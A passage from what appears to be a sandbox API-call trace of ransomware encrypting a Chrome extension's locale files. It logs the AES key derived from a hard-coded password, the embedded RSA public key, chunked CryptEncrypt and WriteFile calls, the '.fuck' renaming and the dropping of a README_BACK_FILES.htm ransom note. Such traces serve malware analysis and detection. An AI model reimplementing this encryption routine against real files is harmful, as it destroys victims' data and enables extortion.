lpOverlapped=0x0) returned 1 [0262.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.522] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.522] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.523] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.524] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.524] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x24b, lpOverlapped=0x0) returned 1 [0262.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x24b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x250) returned 1 [0262.525] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x250, lpOverlapped=0x0) returned 1 [0262.525] CloseHandle (hObject=0x5d5c) returned 1 [0262.525] CloseHandle (hObject=0x5d60) returned 1 [0262.525] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), bFailIfExists=0) returned 1 [0262.535] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json", dwFileAttributes=0x0) returned 1 [0262.535] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.gsg")) returned 1 [0262.536] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.fuck")) returned 1 [0262.537] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.537] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.537] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.537] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.537] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.537] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\readme_back_files.htm")) returned 0xffffffff [0262.538] AreFileApisANSI () returned 1 [0262.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.538] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.538] GetFileType (hFile=0x5d64) returned 0x1 [0262.538] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.539] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.539] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.540] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.540] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.540] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.540] GetLastError () returned 0x0 [0262.540] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json")) returned 0x20 [0262.540] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0262.540] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.541] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.541] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.542] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.557] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.557] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.557] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.557] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.557] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.557] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.557] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e734e8) returned 1 [0262.557] CryptImportPublicKeyInfo (in: hCryptProv=0x2e734e8, dwCertEncodingType=0x1, pInfo=0x2eae050*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae080*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae088*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d940) returned 1 [0262.558] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.558] CryptEncrypt (in: hKey=0x2e7d940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e733d8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e733d8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.558] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e733d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e733d8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.559] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.570] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.570] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.587] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.587] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.587] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.587] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.587] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.587] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.587] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.587] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.587] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.588] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.588] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.588] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.588] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 